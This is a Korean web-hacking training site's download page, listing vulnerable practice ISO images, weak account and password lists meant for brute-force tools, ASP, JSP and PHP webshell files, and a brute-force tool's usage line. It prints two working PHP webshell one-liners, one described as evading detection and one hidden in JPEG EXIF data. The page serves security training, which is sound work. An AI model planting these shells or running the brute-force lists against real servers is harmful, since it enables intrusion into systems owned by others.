>> 목록보이기
#훈련장 ISO 내려받기
#Live ISO
#취약한 계정 목록
#웹쉘
#webshell
#ASP 웹쉘
#JSP 웹쉘
#PHP 웹쉘
웹취약성분석 관련 파일 다운로드
파일다운로드 인증이 필요합니다. (영어로 첫단어는 파일, 둘째단어는 다운로드)
이 누리집의 학습장 다운로드
- weak-root-pw.iso (19.5MB) - 취약한 root 계정 공략 훈련장. 웹 서버뿐만 아니라 네트워크 장비 등 다수의 서버에서 발견되는 취약점임.
- weak-root-pw.md5 - MD5 해쉬값
- wh-comminj-01.iso (35.6MB) - 원격운영제제명령어삽입 취약점.
시스템 명령어를 실행하는 함수의 입력 취약점을 이용하여 원격지에서 서버의 OS 명령어 실행을 할 수 있는 웹해킹 훈련장.
- wh-comminj-01.md5 - MD5 해쉬값
- wh-account-01.iso (35.6MB) - 계정생성 취약점.
계정생성 취약점을 통해 관리자 권한을 탈취하여 웹쉘 업로드로 시스템에 침투할 수 있는 웹해킹 훈련장.
- wh-account-01.md5 - MD5 해쉬값
- wh-account-02.iso (35.6MB) - 회원정보 수정 취약점.
회원정보 수정 취약점을 통해 관리자 권한을 탈취하여 웹쉘 업로드로 시스템에 침투할 수 있는 웹해킹 훈련장.
- wh-account-02.md5 - MD5 해쉬값
- wh-cookie-01.iso (33.4MB) - Cookie의 잘못된 사용 사례. 현재도 사용중인 일부 웹 에디터의 이미지 업로드 기능에 존재하는 취약점을 재구성하였음.
- wh-cookie-01.md5 - MD5 해쉬값
- wh-cookie-02.iso (26.6MB) - Cookie의 잘못된 사용 사례. 웹 에디터의 이미지 업로드 기능에 존재하는 취약점을 그대로 재현하였음.
wh-cookie-01.iso훈련장의 원형임. 과제용으로 사용.- wh-cookie-02.md5 - MD5 해쉬값
- wh-deface-01.iso (33.6MB) - 권한인증/XSS 취약점. 기능별 권한 검증이 취약한 웹 애플리케이션을 통해 XSS 공격 수행으로 홈페이지 위변조가 가능한 웹해킹 훈련장.
- wh-deface-01.md5 - MD5 해쉬값
- wh-filedown-01.iso (24.6MB) - 파일 내려받기가 취약한 훈련장.
파일다운로드 취약점을 단서로 하여 시스템침투 실습을 위한 웹해킹 훈련장.
- wh-filedown-01.md5 - MD5 해쉬값
- wh-illinst-wordpress.iso (42.0MB) - 관리자 비밀번호가 취약한 워드프레스.
워드프레스(WordPress)에서 가장 기초적으로 발생할 수 있는 관리자 권한탈취 및 시스템 침투 취약점 실습을 위한 웹해킹 훈련장.
- wh-illinst-wordpress.md5 - MD5 해쉬값
- wh-imgshell-01.iso (26.2MB) - 이미지 웹쉘 업로드 취약점.
이미지 자체를 검사하나 확장자를 검증하지 않아서 발생하는 취약점 실습을 위한 웹해킹 훈련장.
- wh-imgshell-01.md5 - MD5 해쉬값
- wh-lfi-01.iso (34.8MB) - 내부파일실행(LFI) 취약점.
널바이트삽입(Null-byte Injection)과 LFI(Local File Inclusion) 취약점 실습을 위한 웹해킹 훈련장.
- wh-lfi-01.md5 - MD5 해쉬값
- wh-missAuth-1.iso (28.7MB) - 권한인증 취약점에 의한 관리기능 노출.
관리기능을 숨기지 못하여 발생하는 관리기능 노출에 따른 시스템 침투 실습을 위한 웹해킹 훈련장.
- wh-missAuth-1.md5 - MD5 해쉬값
- wh-pathtrav-01.iso (31.0MB) - 경로조작(Path Traversal) 취약점.
널바이트삽입(Null-byte Injection)을 이용한 파일다운로드 취약점 실습을 위한 웹해킹 훈련장.
서비스 환경설정이 취약하여 서버에 침투할 수 있다.
- wh-pathtrav-01.md5 - MD5 해쉬값
- wh-webeditor-gm.iso (31.6MB) - GM에디터의 이미지 검증 취약점 공격 훈련장.
웹 에디터에서 이미지 확장자 검증이 부재할 경우의 파일업로드 취약점 실습장.
- wh-webeditor-gm.md5 - MD5 해쉬값
- wh-webeditor-ch.iso (31.6MB) - CH에디터의 이미지 검증 취약점 공격 훈련장.
웹 에디터에서 이미지 확장자 검증이 부재할 경우의 파일업로드 취약점 실습장.
- wh-webeditor-ch.md5 - MD5 해쉬값
- wh-webeditor-SE2.iso (28.7MB) - 특수한 상황에서 네이버 스마트에디터의 이미지 검증 우회가 가능한 취약점 공격 훈련장.
PHP의 경로 관련 문자열 처리에 취약점이 존재하는 경우의 파일업로드 취약점 실습장.
- wh-webeditor-SE2.md5 - MD5 해쉬값
- wh-webshell-loc-01.iso (25.2MB) - 업로드한 웹쉘 위치 대량할당 공격 훈련장.
대량할당(Mass Assignment) 방식을 이용하여 업로드한 웹쉘의 위치를 찾아내는 웹해킹 훈련장.
- wh-webshell-loc-01.md5 - MD5 해쉬값
- wh-webgoat-7.0.1.iso (287.7MB) - OWASP WebGoat 웹취약점 실습 훈련장.
OWASP에서 Tomcat 기반으로 만든 WebGoat 웹해킹 훈련장. 버전 7.0.1 (2016). 메모리는 1GB이상 권장.
- wh-webgoat-7.0.1.md5 - MD5 해쉬값
root/root로 로그인 후./start-webgoat.sh실행. [Enter]를 4~5회 입력. - wh-dvwa-1.9.iso (30.7MB) - Damn Vulnerable Web Application 라이브 ISO.
PHP 기반의 취약한 웹 어플리케이션 실습 훈련장.
- wh-dvwa-1.9.md5 - MD5 해쉬값
계정관련 취약점 점검용 파일
- weakuser.txt - 취약한 관리자/시험계정 목록
- weakpass.txt - 자주 사용하지만 취약한 비밀번호 목록. 500 취약 비번 목록을 기반으로 구성하였음.
weakuser.txt, weakpass.txt 파일은 THC Hydra와 같은 계정정보 무작위대입공격에
사용할 수 있다.
파일업로드 취약점 점검용 파일
- cmd.asp.txt - 간단한 ASP 웹쉘
- devshell.asp.txt - 간단한 ASP 웹쉘
- cmd.aspx.txt - 간단한 ASPX 웹쉘
- devshell.aspx.txt - 복잡한 ASPX 웹쉘
- devshell.cgi.txt - 복잡한 CGI 기반 웹쉘
- cmd.jsp.txt - 간단한 JSP 웹쉘
- devshell.jsp.txt - 복잡한 JSP 웹쉘
- cmd.jspx.txt - 간단한 JSPX 웹쉘
- jspspy.jspx.txt - 복잡한 JSPX 웹쉘 (JSPSPY)
- cmd.php.txt - 간단한 PHP 웹쉘
- devshell.php.txt - 복잡한 PHP 웹쉘
- b374k.php.txt - 복잡한 PHP 웹쉘, b374k 3.2.3
- extractxy.php.txt -
extract()함수를 이용한 간단한 PHP 웹쉘, 정보보호장비로 탐지가 어려움
- PHP 웹쉘 코드:<?php @extract($_REQUEST); @die($x($y)); ?> - kth.exif.jpg - Exif 메타데이터의 Camera Model 항목에 다음과 같은 PHP 웹쉘 포함
- PHP 웹쉘 코드:<pre><?php $_REQUEST[1]($_REQUEST[2])?></pre> - HttpBasicAuthBruter.txt - HTTP Basic Authentication 대상 무작위대입공격 도구
- 사용법:# php HttpBasicAuthBruter.txt id_list.txt pw_list.txt target_url
웹쉘(webshell) 파일은 다운로드 후 확장자가 ".txt"인 경우에는 확장자를 제거하고 사용하면 된다.
웹취약성분석 관련 문서 등 기타 파일
- vawaex01-sqli-1-auto.ppt.pptx (1.1Mb) - PentesterLab "From SQL Inejction to Shell 훈련장의 기본 공략법 실습설명서
[처음 작성한 날: 2016.11.08] [마지막으로 고친 날: 2018.06.19]
< 이전 글 : 길찾기(sitemap) (2016.11.09)
> 다음 글 : SQL 인젝션 공격도구 sqlmap의 간단한 사용법 (2016.11.07)
이 저작물은 크리에이티브
커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다.
잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다.
문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문